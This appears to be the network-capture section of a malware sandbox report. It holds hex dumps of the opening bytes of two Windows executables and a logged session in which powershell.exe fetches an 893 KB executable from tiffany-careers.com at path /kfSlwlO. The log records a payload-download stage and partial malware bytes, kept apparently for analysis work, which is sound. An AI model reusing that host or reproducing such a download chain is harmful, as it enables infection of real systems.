                                                                                                                  etag: "108a00-67670d1b-23c3f;;;"
                                                                                                                  last-modified: Sat, 21 Dec 2024 18:46:51 GMT
                                                                                                                  content-type: application/x-executable
                                                                                                                  content-length: 1083904
                                                                                                                  accept-ranges: bytes
                                                                                                                  date: Mon, 23 Dec 2024 06:08:08 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                  connection: close
                                                                                                                  2024-12-23 06:08:09 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6f 31 29 eb 2b 50 47 b8 2b 50 47 b8 2b 50 47 b8 9f cc b6 b8 3e 50 47 b8 9f cc b4 b8 b7 50 47 b8 9f cc b5 b8 0a 50 47 b8 b5 f0 80 b8 2a 50 47 b8 79 38 42 b9 05 50 47 b8 79 38 43 b9 3a 50 47 b8 79 38 44 b9 23 50 47 b8 22 28 c4 b8 23 50 47 b8 22 28 c0 b8 2a 50 47 b8 22 28 d4 b8 0e 50 47 b8 2b 50 46 b8 06 52 47 b8 8e 39 49 b9 7b 50 47 b8 8e 39 44 b9 2a 50 47 b8 8e 39 b8 b8 2a 50 47
                                                                                                                  Data Ascii: MZ@0!L!This program cannot be run in DOS mode.$o1)+PG+PG+PG>PGPGPG*PGy8BPGy8C:PGy8D#PG"(#PG"(*PG"(PG+PFRG9I{PG9D*PG9*PG
                                                                                                                  2024-12-23 06:08:09 UTC16384INData Raw: c0 48 8d 45 20 48 8b d6 4c 8d 45 28 48 89 44 24 20 e8 5e f5 ff ff 85 c0 0f 88 96 70 04 00 48 8d 4d c0 e8 55 54 00 00 44 8b 45 20 e9 00 ff ff ff 48 8d 0d f9 ba 0e 00 e8 5c 09 00 00 33 c0 4c 8d 5c 24 70 49 8b 5b 30 49 8b 73 38 49 8b e3 41 5f 41 5e 5d c3 48 89 5c 24 08 48 89 7c 24 10 55 48 8b ec 48 83 ec 70 41 8b 18 45 33 db ff cb 44 89 5d c8 4c 8b d1 89 5d b4 49 8b f8 4c 89 5d d0 c7 45 d8 01 00 00 00 41 8b cb 44 89 5d e0 45 8a cb 4c 89 5d e8 c7 45 f0 01 00 00 00 c7 45 b0 02 00 00 00 44 8b 07 41 8b d0 41 8d 40 01 89 07 e8 75 06 00 00 48 85 c0 74 2c 45 84 c9 75 27 48 8b 40 08 48 8b 10 66 44 39 5a 08 75 d7 8b 12 83 ea 0b 74 4f 83 fa 01 75 cb 85 c9 75 42 44 8a ca 44 89 45 b8 eb be 49 8d 8a 68 02 00 00 48 8d 55 b0 e8 98 07 00 00 8d 43 01 48 8d 4d e0 89 07 e8 de
                                                                                                                  Data Ascii: HE HLE(HD$ ^pHMUTDE H\3L\$pI[0Is8IA_A^]H\$H|$UHHpAE3D]L]IL]EAD]EL]EEDAA@uHt,Eu'H@HfD9ZutOuuBDDEIhHUCHM
                                                                                                                  2024-12-23 06:08:09 UTC16384INData Raw: 84 24 88 00 00 00 89 74 24 50 4d 8b c5 48 89 44 24 48 8b d7 8b 84 24 18 01 00 00 89 44 24 40 8b 84 24 20 01 00 00 89 44 24 38 8b 44 24 60 89 5c 24 30 44 89 74 24 28 89 44 24 20 e8 5c 00 00 00 48 8b b4 24 28 01 00 00 8b d8 48 8b ce e8 8e 87 00 00 48 8b ce c7 46 10 01 00 00 00 89 1e e8 59 73 00 00 85 c0 0f 84 71 49 04 00 83 ff 1d 74 08 49 8b cd e8 ac bf 01 00 45 33 f6 48 8d 4c 24 70 e8 5b 87 00 00 41 8b c6 48 81 c4 c8 00 00 00 41 5f 41 5e 41 5d 41 5c 5f 5e 5d 5b c3 48 8b c4 48 89 58 20 4c 89 40 18 48 89 48 08 55 56 57 41 54 41 55 41 56 41 57 48 8d 68 c1 48 81 ec 90 00 00 00 8b 3d e1 80 0e 00 45 33 ed 41 8b d9 44 8b fa 83 fa 0c 0f 84 33 49 04 00 83 fa 0d 7e 1b 83 fa 0f 0f 8e 25 49 04 00 83 fa 11 0f 84 1c 49 04 00 83 fa 14 0f 84 13 49 04 00 83 ff ff 0f 84 36
                                                                                                                  Data Ascii: $t$PMHD$H$D$@$ D$8D$`\$0Dt$(D$ \H$(HHFYsqItIE3HL$p[AHA_A^A]A\_^][HHX L@HHUVWATAUAVAWHhH=E3AD3I~%III6
                                                                                                                  2024-12-23 06:08:09 UTC16384INData Raw: c1 89 83 c8 00 00 00 3b 53 1c 0f 8d e6 42 04 00 4c 63 9d 58 01 00 00 41 3b d3 0f 8f eb 42 04 00 8b 43 18 48 8b 7b 10 41 2b c1 49 63 d0 8b 04 87 89 04 97 41 8d 40 01 48 8b 7c 24 48 49 8b d7 48 2b 93 98 00 00 00 48 d1 fa 48 63 c8 48 8b 43 10 89 14 88 8b 95 48 01 00 00 45 3b d8 0f 8f 8e fb ff ff 45 8d 58 02 44 89 9d 58 01 00 00 e9 7e fb ff ff 83 ff 10 0f 85 39 03 00 00 8b 95 48 01 00 00 49 83 c6 06 e9 af fa ff ff 49 83 c6 02 83 c7 ab 49 8b ce 40 f6 c7 01 74 06 41 bd 01 00 00 00 46 0f be 9c 1f f8 80 0c 00 8b c7 48 8d 3d 4e 33 ff ff 44 89 5c 24 58 44 0f be 94 38 e8 80 0c 00 44 89 54 24 50 45 85 d2 75 0c b8 ff ff ff 7f 44 8b d0 89 44 24 50 bf 01 00 00 00 45 0f b7 0e 4c 8d 71 02 44 89 4c 24 54 41 8d 41 f1 83 f8 01 0f 86 da 6d 04 00 48 c7 c0 ff ff ff ff 8b c8 89
                                                                                                                  Data Ascii: ;SBLcXA;BCH{A+IcA@H|$HIH+HHcHCHE;EXDX~9HIII@tAFH=N3D\$XD8DT$PEuDD$PELqDL$TAAmH
                                                                                                                  2024-12-23 06:08:09 UTC16384INData Raw: 00 00 49 8b 0c df 49 8b d5 e8 16 40 01 00 49 89 3c df 48 ff c3 49 3b de 72 e8 4c 8b 6c 24 48 e9 cf fa ff ff 4c 8d 3d d5 f3 fe ff 49 8b 5c fd 00 48 85 db 74 61 48 8b 73 08 48 85 f6 74 36 48 8b 46 18 ff 08 48 8b 46 18 44 39 30 75 16 48 8b 0e e8 cf 3f 01 00 48 8b 4e 18 ba 04 00 00 00 e8 c1 3f 01 00 ba 20 00 00 00 48 8b ce e8 b4 3f 01 00 4c 89 73 08 8b 43 10 83 f8 05 0f 8d f6 00 00 00 b8 01 00 00 00 44 89 33 48 8b cb 89 43 10 8d 50 17 e8 8e 3f 01 00 4d 89 74 fd 00 48 ff c7 49 3b fc 72 88 e9 62 fa ff ff 44 8b 5c 24 40 45 33 c0 48 8b 9d a8 00 00 00 e9 ac f6 ff ff 41 83 e9 01 0f 88 dd fa ff ff 41 ff c2 41 ff c0 e9 a0 fa ff ff 48 8b 9d b0 00 00 00 48 8b cb c6 00 00 e8 fd 06 00 00 49 8b c7 89 43 10 33 c0 89 03 e9 93 f8 ff ff 49 8b 0a 48 8b 17 48 85 c0 74 20 44 0f
                                                                                                                  Data Ascii: II@I<HI;rLl$HL=I\HtaHsHt6HFHFD90uH?HN? H?LsCD3HCP?MtHI;rbD\$@E3HAAAHHIC3IHHt D
                                                                                                                  2024-12-23 06:08:09 UTC16384INData Raw: e8 db c7 ff ff 48 8d 15 94 9e 0d 00 49 8b cc e8 dc 05 00 00 c6 44 24 51 00 e9 86 fd ff ff 80 7c 24 51 00 0f 85 89 aa 04 00 49 8b dc e9 93 fd ff ff 44 8b 6c 24 40 4c 8b 64 24 48 4c 8b 74 24 38 4c 89 64 24 58 4c 89 b5 88 00 00 00 45 85 ed 0f 84 c6 b6 04 00 41 83 fd 01 0f 85 d0 b6 04 00 49 8b d6 48 8d 4d 90 48 c7 45 98 00 00 00 00 e8 7d 05 00 00 48 8d 4d 90 e8 3c fe fe ff 84 c0 0f 85 75 02 00 00 83 fb 07 75 62 48 8b 55 78 4d 8b c7 e8 9b 94 00 00 85 c0 0f 88 f3 b8 04 00 83 fb 08 0f 84 a2 b6 04 00 41 83 fd 01 0f 85 b5 b6 04 00 49 8b de 48 8b cb e8 25 c7 ff ff c6 03 00 80 7c 24 34 00 c7 43 10 09 00 00 00 0f 85 ae b6 04 00 80 7d 88 00 0f 84 c6 b6 04 00 b0 01 48 ff cf 88 45 89 48 89 7c 24 78 88 44 24 34 48 8d 4d 90 e8 ec c6 ff ff 48 8b 7d 78 e9 fe ef ff ff 83 f8
                                                                                                                  Data Ascii: HID$Q|$QIDl$@Ld$HLt$8Ld$XLEAIHMHE}HM<uubHUxMAIH%|$4C}HEH|$xD$4HMH}x
                                                                                                                  2024-12-23 06:08:09 UTC16384INData Raw: 8d 05 6a eb 06 00 48 89 45 f0 48 8d 05 5f fb 09 00 48 89 05 d8 2f 0d 00 48 8d 05 41 ec 06 00 48 c7 45 f8 00 00 00 00 0f 11 05 7a 2f 0d 00 c7 05 5c 2f 0d 00 01 00 00 00 0f 10 45 f0 48 89 45 f0 48 8d 05 d1 04 0a 00 48 89 05 ca 2f 0d 00 48 8d 05 4b f0 06 00 48 c7 45 f8 00 00 00 00 0f 29 05 6c 2f 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 f5 05 0a 00 48 89 05 c6 2f 0d 00 48 8d 05 c7 f1 06 00 48 c7 45 f8 00 00 00 00 0f 11 05 68 2f 0d 00 66 c7 05 ff 2e 0d 00 00 00 0f 10 45 f0 48 89 45 f0 48 8d 05 b8 ef 09 00 48 89 05 b9 2f 0d 00 48 8d 05 fe f3 06 00 48 c7 45 f8 00 00 00 00 0f 29 05 5b 2f 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 f4 05 0a 00 48 c7 45 f8 00 00 00 00 0f 11 05 65 2f 0d 00 48 89 05 a6 2f 0d 00 48 8d 05 bb 5a 00 00 0f 10 45 f0 48 89 45 f0 48 8d 05 a0 f7 09
                                                                                                                  Data Ascii: jHEH_H/HAHEz/\/EHEHH/HKHE)l/EHEHH/HHEh/f.EHEHH/HHE)[/EHEHHEe/H/HZEHEH
                                                                                                                  2024-12-23 06:08:09 UTC16384INData Raw: 00 c7 05 89 12 0d 00 02 00 00 00 66 c7 05 84 12 0d 00 00 00 c7 05 9a 12 0d 00 02 00 00 00 c7 05 94 12 0d 00 02 00 00 00 66 c7 05 8f 12 0d 00 00 00 c7 05 a5 12 0d 00 02 00 00 00 c7 05 9f 12 0d 00 03 00 00 00 66 c7 05 9a 12 0d 00 00 00 c7 05 b0 12 0d 00 01 00 00 00 c7 05 aa 12 0d 00 01 00 00 00 66 c7 05 a5 12 0d 00 00 00 48 89 05 a6 12 0d 00 48 c7 45 f8 00 00 00 00 48 8d 05 73 6a 08 00 48 89 45 f0 48 8d 05 d4 a4 09 00 0f 10 45 f0 48 89 05 a9 12 0d 00 48 8d 05 72 6c 08 00 48 89 45 f0 48 8d 05 17 b0 09 00 48 89 05 b8 12 0d 00 48 8d 05 99 6e 08 00 48 c7 45 f8 00 00 00 00 0f 29 05 5a 12 0d 00 0f 10 45 f0 48 89 45 f0 48 8d 05 8b b1 09 00 48 89 05 b4 12 0d 00 48 8d 05 81 ab fe ff 48 c7 45 f8 00 00 00 00 0f 11 05 56 12 0d 00 c7 05 34 12 0d 00 02 00 00 00 0f 10 45
                                                                                                                  Data Ascii: ffffHHEHsjHEHEHHrlHEHHHnHE)ZEHEHHHHEV4E
                                                                                                                  2024-12-23 06:08:09 UTC16384INData Raw: 45 33 ff 48 8b 55 88 44 8b 4d a8 66 89 42 04 4c 8b 55 80 bb 52 00 00 00 4c 8b 85 a0 01 00 00 41 8b 88 88 00 00 00 8d 41 01 41 89 80 88 00 00 00 81 f9 fa 00 00 00 0f 8d dc 6b 04 00 b8 80 00 00 00 4d 8b d0 44 3b e8 0f 86 c5 54 04 00 49 8b 42 40 49 2b 42 20 48 d1 f8 48 89 45 18 48 89 55 c8 4c 8b b5 a8 01 00 00 41 8b cf 66 44 89 2a 45 8b c7 41 8b ba 98 00 00 00 49 8b c6 41 8b 5a 70 48 f7 d8 48 89 55 00 48 8d 45 10 48 1b d2 44 89 7d 10 48 23 d0 b8 87 00 00 00 48 89 54 24 70 44 3b e8 4c 89 54 24 68 41 8d 45 81 0f 94 c1 48 8d 55 00 41 3b c3 8b 85 98 01 00 00 41 0f 96 c0 03 c1 48 8b 8d 90 01 00 00 48 89 4c 24 60 48 8d 4d 38 48 89 4c 24 58 48 8d 4d 54 48 89 4c 24 50 48 8d 4d 50 48 89 4c 24 48 48 8d 8d 8c 00 00 00 48 89 4c 24 40 41 8b cc 89 44 24 38 89 74 24 30 48
                                                                                                                  Data Ascii: E3HUDMfBLURLAAAkMD;TIB@I+B HHEHULAfD*EAIAZpHHUHEHD}H#HT$pD;LT$hAEHUA;AHHL$`HM8HL$XHMTHL$PHMPHL$HHHL$@AD$8t$0H
                                                                                                                  2024-12-23 06:08:09 UTC16384INData Raw: 22 11 ff d0 48 83 c4 20 4c 8b 65 c0 4c 8b 6d c8 4c 8b 75 d0 4c 8b 7d d8 48 8b 5d e0 48 8b e5 5d c3 cc cc cc e9 8b 85 fe ff cc cc cc 40 53 48 83 ec 20 48 8b d9 eb 0f 48 8b cb e8 1d 46 00 00 85 c0 74 13 48 8b cb e8 5d 01 01 00 48 85 c0 74 e7 48 83 c4 20 5b c3 48 83 fb ff 74 06 e8 9f 09 00 00 cc e8 b9 09 00 00 cc e9 bf ff ff ff cc cc cc 48 83 ec 28 e8 57 0b 00 00 85 c0 74 21 65 48 8b 04 25 30 00 00 00 48 8b 48 08 eb 05 48 3b c8 74 14 33 c0 f0 48 0f b1 0d 9c a2 0c 00 75 ee 32 c0 48 83 c4 28 c3 b0 01 eb f7 cc cc cc 40 53 48 83 ec 20 0f b6 05 87 a2 0c 00 85 c9 bb 01 00 00 00 0f 44 c3 88 05 77 a2 0c 00 e8 86 09 00 00 e8 19 19 00 00 84 c0 75 04 32 c0 eb 14 e8 a4 5f 01 00 84 c0 75 09 33 c9 e8 35 19 00 00 eb ea 8a c3 48 83 c4 20 5b c3 cc cc cc 40 53 48 83 ec 40 80
                                                                                                                  Data Ascii: "H LeLmLuL}H]H]@SH HHFtH]HtH [HtH(Wt!eH%0HHH;t3Hu2H(@SH Dwu2_u35H [@SH@


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  3192.168.2.849720147.45.49.1554435544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-12-23 06:08:16 UTC171OUTGET /kfSlwlO HTTP/1.1
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                  Host: tiffany-careers.com
                                                                                                                  Connection: Keep-Alive
                                                                                                                  2024-12-23 06:08:17 UTC397INHTTP/1.1 200 OK
                                                                                                                  etag: "da2a8-67670bf7-23c3e;;;"
                                                                                                                  last-modified: Sat, 21 Dec 2024 18:41:59 GMT
                                                                                                                  content-length: 893608
                                                                                                                  accept-ranges: bytes
                                                                                                                  date: Mon, 23 Dec 2024 06:08:16 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                  connection: close
                                                                                                                  2024-12-23 06:08:17 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a
                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sDR*R*R*CP*S*_@a*_@*_@g*[j[*[jw*R+r**S*_@S*RP*S*RichR*
                                                                                                                  2024-12-23 06:08:17 UTC16384INData Raw: 03 03 04 55 8b ec 56 8b f1 e8 b2 01 00 00 8a 45 08 88 06 8b c6 c7 46 0c 09 00 00 00 5e 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 20 53 56 57 8b f9 89 7d f8 e8 a5 fb ff ff 8b 37 8b ce e8 04 fa ff ff 8b 06 8b 5d 08 c7 80 10 02 00 00 00 00 00 00 8b 5b 08 89 5d f4 85 db 0f 84 b2 00 00 00 53 6a 01 ff 37 e8 cd f8 ff ff 83 c4 0c 33 f6 85 db 0f 84 9b 00 00 00 8b 45 08 6a 10 8b 40 04 8b 1c b0 e8 56 c3 01 00 8b f8 83 c4 04 85 ff 74 7e 8b 0b 89 0f 8b 4b 04 89 4f 04 8b 4b 08 89 4f 08 8b 43 0c 89 47 0c ff 00 8b 5d f8 8d 45 e4 56 6a 01 50 ff 33 89 7d ec c7 45 f0 04 00 00 00 e8 04 f7 ff ff 83 c4 10 85 ff 74 21 8b 47 0c ff 08 8b 47 0c 83 38 00 0f 84 34 8d 03 00 57 e8 72 c3 01 00 83 c4 04 c7 45 ec 00 00 00 00 46 c7 45 f0 01 00 00 00 c7 45 e4
                                                                                                                  Data Ascii: UVEF^]U SVW}7][]Sj73Ej@Vt~KOKOCG]EVjP3}Et!GG84WrEFEE
                                                                                                                  2024-12-23 06:08:17 UTC16384INData Raw: 13 ca 99 3b 45 fc 0f 85 a9 88 03 00 3b d1 0f 85 a1 88 03 00 8b 45 ec 89 03 8b 55 d8 89 55 fc 8b 4b 08 85 c9 0f 85 d4 88 03 00 8b 4d e0 85 c9 0f 85 e1 88 03 00 8b 45 e4 83 f8 05 0f 8d ed 88 03 00 d9 ee dd 55 d8 c7 45 e4 03 00 00 00 8b 4e 0c 8b c1 c1 e0 06 8b 80 14 5f 4a 00 83 f8 03 0f 85 6c 89 03 00 83 f9 01 0f 85 18 8a 03 00 db 06 de d9 df e0 f6 c4 05 0f 8b 8d 89 03 00 8b 4f 1c 8b c1 c1 e0 04 03 43 0c 8b 04 85 08 5f 4a 00 83 f8 01 0f 85 93 00 00 00 83 f9 01 0f 85 6a 8b 03 00 8b 47 10 89 45 fc 8b f0 8b 43 0c 83 f8 01 0f 85 f9 8b 03 00 8b 03 3b f0 7c 29 8b 4f 04 8b 45 0c 41 89 08 8b 4d e0 85 c9 0f 85 89 8c 03 00 8b 45 e4 83 f8 05 0f 8d 8f 8c 03 00 5f 5e 5b 8b e5 5d c2 08 00 8b 75 f8 81 c6 5c 01 00 00 80 7e 09 00 0f 85 45 8c 03 00 80 7e 08 00 75 5f 8b 7e 04
                                                                                                                  Data Ascii: ;E;EUUKMEUEN_JlOC_JjGEC;|)OEAME_^[]u\~E~u_~
                                                                                                                  2024-12-23 06:08:17 UTC16384INData Raw: 93 00 00 00 e9 cf 7c 03 00 8b 41 04 6a 7f 59 66 39 48 08 0f 85 b2 7c 03 00 8b 45 f8 48 4e 83 7d 94 00 89 45 f8 74 2e 8d 4d 94 e8 51 34 01 00 8d 4d 94 8b 18 e8 55 34 01 00 8b 45 f8 85 c0 78 08 3b f3 0f 84 1d fd ff ff 57 6a 78 e9 88 7c 03 00 8d 5e 01 eb 9d 8d 5e 01 eb e2 8d 5e 01 e9 45 fd ff ff 8d 5e 01 e9 17 fe ff ff 8b ff a9 c8 40 00 b3 48 44 00 5e cb 40 00 6e cb 40 00 41 ca 40 00 9b cb 40 00 09 cc 40 00 80 cb 40 00 cf cb 40 00 4f c9 40 00 70 c9 40 00 cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 83 ec 1c 53 56 57 8b 7d 08 33 f6 ba 01 00 00 00 89 74 24 18 89 74 24 20 8b d9 89 54 24 24 8b 47 04 89 74 24 10 8b 00 89 44 24 14 0f bf 40 08 83 f8 33 75 28 57 e8 a0 cf ff ff 8b 4c 24 20 85 c9 75 3c 8b 74 24 18 8b 54 24 24 83 fa 05 0f 8d a8 7c 03 00 5f 5e 5b 8b e5 5d
                                                                                                                  Data Ascii: |AjYf9H|EHN}Et.MQ4MU4Ex;Wjx|^^^E^@HD^@n@A@@@@@O@p@USVW}3t$t$ T$$Gt$D$@3u(WL$ u<t$T$$|_^[]
                                                                                                                  2024-12-23 06:08:17 UTC16384INData Raw: 00 00 8b 5d 10 33 c0 6a ff 50 8b cb c6 45 cf 00 89 45 a0 e8 69 0d 00 00 83 7d 0c 00 75 04 c6 45 cf 01 8d 4d d0 e8 dd 05 00 00 8d 4d b4 e8 d5 05 00 00 33 d2 33 f6 89 55 c4 89 75 f0 8d 64 24 00 80 7d cf 00 0f 84 bf df 03 00 83 7f 14 00 0f 84 89 03 00 00 80 7f 10 00 0f 84 7f 03 00 00 83 fa ff 0f 84 76 03 00 00 8b 4f 1c 3b d1 0f 8f 6b 03 00 00 ff 77 24 8b 47 34 ff 77 20 0b 47 2c 50 52 8b 57 18 51 ff 37 8b 4f 14 e8 12 ea ff ff 8b c8 83 c4 18 89 4f 28 85 c9 0f 8e 30 03 00 00 8b 47 20 8b 50 04 c7 47 2c 00 00 00 00 8b 18 3b 58 04 89 5d c8 8b 5d 10 0f 84 5c df 03 00 89 55 c4 85 c9 0f 84 16 03 00 00 8b 47 20 8b 30 8b 45 f0 2b f0 0f 84 a3 02 00 00 8b 4f 04 3b c1 0f 83 98 02 00 00 83 fe ff 0f 84 2c 03 00 00 03 c6 3b c1 0f 87 1f 03 00 00 8b 4d c0 8b 01 83 f8 01 0f 8f
                                                                                                                  Data Ascii: ]3jPEEi}uEMM33Uud$}vO;kw$G4w G,PRWQ7OO(0G PG,;X]]\UG 0E+O;,;M
                                                                                                                  2024-12-23 06:08:17 UTC16384INData Raw: b8 00 47 3b 7e 08 73 e0 eb e5 56 8b f1 c7 06 c4 09 49 00 e8 c5 ff ff ff ff 76 04 e8 3c c4 00 00 59 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 53 8b d9 57 33 ff 39 7b 08 76 40 56 8d 64 24 00 8b 73 04 8b 34 be 85 f6 74 16 8b 46 0c ff 08 8b 46 0c 83 38 00 74 29 56 e8 ff c3 00 00 83 c4 04 8b 43 04 c7 04 b8 00 00 00 00 47 3b 7b 08 72 d0 c7 43 08 00 00 00 00 5e 5f 5b c3 89 7b 08 eb f8 ff 36 e8 d5 c3 00 00 ff 76 0c e8 cd c3 00 00 83 c4 08 eb c3 55 8b ec 56 8b f1 8b 46 0c 39 46 08 75 2f 8d 0c 00 6a 08 58 3b c8 73 5f 57 33 c9 89 46 0c 6a 04 5a f7 e2 0f 90 c1 f7 d9 0b c8 51 e8 22 c3 00 00 83 7e 04 00 8b f8 59 75 42 89 7e 04 5f 6a 10 e8 0e c3 00 00 8b d0 59 85 d2 74 51 8b 45 08 8b 08 89 0a 8b 48 04 89 4a 04 8b 48 08 89 4a 08 8b 40 0c 89 42 0c ff 00 8b 4e 08 8b 46
                                                                                                                  Data Ascii: G;~sVIv<Y^SW39{v@Vd$s4tFF8t)VCG;{rC^_[{6vUVF9Fu/jX;s_W3FjZQ"~YuB~_jYtQEHJHJ@BNF
                                                                                                                  2024-12-23 06:08:17 UTC16384INData Raw: 05 f4 2b 4c 00 38 04 47 00 c7 05 f8 2b 4c 00 00 00 00 00 c7 05 fc 2b 4c 00 00 00 00 00 c7 05 00 2c 4c 00 02 00 00 00 c7 05 04 2c 4c 00 02 00 00 00 c6 05 08 2c 4c 00 00 c7 05 0c 2c 4c 00 08 15 49 00 c7 05 18 2c 4c 00 94 04 47 00 c7 05 1c 2c 4c 00 00 00 00 00 c7 05 20 2c 4c 00 00 00 00 00 c7 05 24 2c 4c 00 02 00 00 00 c7 05 28 2c 4c 00 02 00 00 00 c6 05 2c 2c 4c 00 00 c7 05 30 2c 4c 00 28 15 49 00 c7 05 3c 2c 4c 00 f0 04 47 00 c7 05 40 2c 4c 00 00 00 00 00 c7 05 44 2c 4c 00 00 00 00 00 c7 05 48 2c 4c 00 02 00 00 00 c7 05 4c 2c 4c 00 02 00 00 00 c6 05 50 2c 4c 00 00 c7 05 54 2c 4c 00 4c 15 49 00 c7 05 60 2c 4c 00 30 05 47 00 c7 05 64 2c 4c 00 00 00 00 00 c7 05 68 2c 4c 00 00 00 00 00 c7 05 6c 2c 4c 00 02 00 00 00 c7 05 70 2c 4c 00 03 00 00 00 c6 05 74 2c 4c
                                                                                                                  Data Ascii: +L8G+L+L,L,L,L,LI,LG,L ,L$,L(,L,,L0,L(I<,LG@,LD,LH,LL,LP,LT,LLI`,L0Gd,Lh,Ll,Lp,Lt,L
                                                                                                                  2024-12-23 06:08:17 UTC16384INData Raw: cb 41 00 a6 cb 41 00 9d 12 45 00 ba 12 45 00 71 cb 41 00 ae cb 41 00 61 12 45 00 6e 12 45 00 ef 12 45 00 ff 12 45 00 0d 13 45 00 27 13 45 00 b4 cb 41 00 55 8b ec 83 ec 10 53 8b d9 89 4d f0 56 33 c9 57 8b fa 41 89 7d f4 33 d2 89 4d f8 0f b7 03 8d 73 04 b9 85 00 00 00 c7 45 fc 01 00 00 00 66 3b c1 0f 84 c8 00 00 00 83 c1 05 66 3b c1 0f 84 bc 00 00 00 b9 86 00 00 00 66 3b c1 0f 84 ae 00 00 00 83 c1 05 66 3b c1 0f 84 a2 00 00 00 0f b7 06 3d a1 00 00 00 0f 87 e4 00 00 00 0f b6 80 0f ce 41 00 ff 24 85 8b cd 41 00 ff 75 08 ff 75 0c 52 8d 56 02 8b cf e8 f5 01 00 00 83 c4 0c 33 d2 8b 4d f8 8b 5d f0 6a 77 0f b7 43 02 8d 1c 43 58 89 5d f0 66 39 03 0f 84 71 ff ff ff 8b c1 5f 5e 5b 8b e5 5d c3 66 83 3e 70 8b ca 0f 84 ea 47 03 00 8d 4e 02 83 c6 22 85 c9 74 12 6a 20 8b
                                                                                                                  Data Ascii: AAEEqAAaEnEEEE'EAUSMV3WA}3MsEf;f;f;f;=A$AuuRV3M]jwCCX]f9q_^[]f>pGN"tj
                                                                                                                  2024-12-23 06:08:17 UTC16384INData Raw: 33 41 fe ff 8d 45 e8 50 ff 77 08 e8 1a 34 ff ff ff 75 e8 68 a8 2c 49 00 56 e8 e7 3e 00 00 83 c4 0c 89 45 f8 80 7d ff 00 0f 85 12 5d 03 00 8d 4d e8 e8 80 10 ff ff 8b 7d f8 56 e8 8b 40 00 00 59 83 fb ff 74 19 53 56 e8 ba 3c 00 00 59 50 e8 e1 3a 00 00 59 59 8b c7 5f 5e 5b 8b e5 5d c3 68 00 40 00 00 eb e1 55 8b ec 51 51 56 57 8b f9 c7 45 f8 01 00 00 00 33 c0 8b f2 88 45 ff 85 ff 74 74 8b 06 0f b7 04 47 50 e8 e1 2b 00 00 59 85 c0 75 67 8b 0e 33 d2 53 8b 5d 08 0f b7 04 4f 89 13 83 e8 2b 74 5c 48 48 74 54 8b 06 66 39 14 47 74 32 8b 06 0f b7 04 47 50 e8 d3 31 00 00 59 85 c0 74 21 6b 03 0a 8b 16 c6 45 ff 01 0f b7 0c 57 83 c0 d0 03 c1 8d 4a 01 89 03 33 c0 89 0e 66 39 04 4f 75 ce 8b 0b 0f af 4d f8 8a 45 ff 89 0b 5b 5f 5e 8b e5 5d c3 32 c0 eb f6 ff 06 eb 84 83 4d f8
                                                                                                                  Data Ascii: 3AEPw4uh,IV>E}]M}V@YtSV<YP:YY_^[]h@UQQVWE3EttGP+Yug3S]O+t\HHtTf9Gt2GP1Yt!kEWJ3f9OuME[_^]2M
